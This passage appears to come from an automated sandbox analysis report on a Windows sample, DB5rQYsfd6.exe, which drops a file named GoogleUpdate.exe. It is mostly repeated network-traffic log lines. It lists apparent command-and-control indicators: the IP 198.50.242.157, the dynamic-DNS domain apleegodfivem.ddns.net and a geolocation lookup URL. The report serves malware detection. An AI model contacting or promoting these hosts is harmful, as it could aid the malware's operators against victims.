                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.50.242.157
                  Source: C:\Users\user\Desktop\DB5rQYsfd6.exeCode function: 0_2_0041936B InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_0041936B
                  Source: global trafficDNS traffic detected: DNS query: apleegodfivem.ddns.net
                  Source: GoogleUpdate.exeString found in binary or memory: http://geoplugin.net/json.gp
                  Source: DB5rQYsfd6.exe, GoogleUpdate.exe.0.drString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57084 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59265 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62435 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 64616 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61580 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49451 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52633 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61109 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49463 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 63773 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59253 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 64628 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51777 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60266 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54802 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52645 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60242 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51319 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50439 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 63303 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61122 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61592 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60278 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62411 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52608 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54814 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51789 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53958 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62447 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51320 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 63761 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59290 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62460 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 64641 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61134 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60229 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 63797 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53934 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 63315 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49426 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49438 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60230 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59289 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62459 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57047 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53946 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51765 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 63327 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61543 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59277 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60291 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 63785 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60217 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59216 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51307 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57035 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62002 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60687 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52621 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56180 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54863 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61146 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53848
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53847
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53846
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53845
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53849
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53840
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53844
                  Source: unknownNetwork traffic detected: HTTP traffic on port 65521 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50873 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53537 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53843
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53842
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53841
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62496 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57023 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53859
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53858
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53857
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53856
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53851
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53850
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60675 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61158 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 63700 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53855
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62868 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53854
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53853
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53852
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53910 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 65533 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52200 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50885 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51207
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51208
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53869
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51205
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53868
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57011 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51206
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53867
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51209
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58348 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53862
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51200
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53861
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53860
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51203
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53866
                  Source: unknownNetwork traffic detected: HTTP traffic on port 65508 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51204
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53865
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54851 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56192 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53864
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51201
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53863
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51202
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59228 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62472 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50861 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49499 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53525 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62484 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51218
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53922 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51219
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51216
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53879
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51217
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53878
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51210
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53873
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51211
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53872
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53871
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53870
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53877
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51214
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50897 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53876
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51212
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53875
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53874
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52212 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51213
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53880
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60663 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61555 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53804
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53803
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53802
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53801
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53808
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53807
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53806
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53805
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60651 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53800
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49487 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54838 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55299 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61183 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58324 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53809
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62893 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53815
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53814
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53813
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53812
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61976 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53819
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53818
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53817
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53816
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53811
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61567 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62881 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53810
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53501 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 64219 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53826
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53825
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53824
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59649 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53823
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51790 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53829
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53828
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53827
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55287 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53822
                  Source: unknownNetwork traffic detected: HTTP traffic on port 64207 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53821
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53820
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58312 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61171 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 64604 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61579 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54826 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53837
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53836
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53835
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54430 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53834
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53839
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53838
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53833
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53513 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53832
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53831
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53830
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59241 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53909 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61964 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55755 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49475 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60254 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63131
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63130
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51144
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51142
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51143
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51148
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51149
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51146
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51147
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56623 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63129
                  Source: unknownNetwork traffic detected: HTTP traffic on port 65077 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59637 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51151
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51152
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51150
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53598 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63122
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60626 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63121
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63124
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63123
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63126
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63125
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53116 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63127
                  Source: unknownNetwork traffic detected: HTTP traffic on port 65089 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63140
                  Source: unknownNetwork traffic detected: HTTP traffic on port 64256 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63142
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63141
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51155
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51156
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51159
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51157
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51158
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54442 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51162
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57456 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51163
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51161
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63133
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63132
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63135
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63134
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63137
                  Source: unknownNetwork traffic detected: HTTP traffic on port 64232 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63136
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63139
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63138
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56635 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63151
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63150
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63152
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51166
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51167
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51165
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60638 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51168
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51169
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51170
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51173
                  Source: unknownNetwork traffic detected: HTTP traffic on port 64268 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51174
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51171
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51172
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63144
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63143
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63146
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63148
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63147
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59625 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63149
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63160
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63162
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50824 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63161
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63164
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57444 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63163
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51177
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51178
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51175
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53104 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51176
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61195 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 64220 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51179
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51180
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51181
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51184
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51185
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51182
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51183
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63155
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63154
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63157
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63156
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63159
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53562 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63158
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54454 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51108
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56576 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51109
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51106
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59601 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51107
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53768
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54395 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53763
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51100
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51101
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57420 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51104
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53767
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51105
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53766
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51102
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53765
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51103
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61988 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53770
                  Source: unknownNetwork traffic detected: HTTP traffic on port 63376 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50848 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57503 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51119
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56659 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51117
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53779
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51118
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51111
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53774
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51112
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53773
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53772
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51110
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53771
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51115
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53778
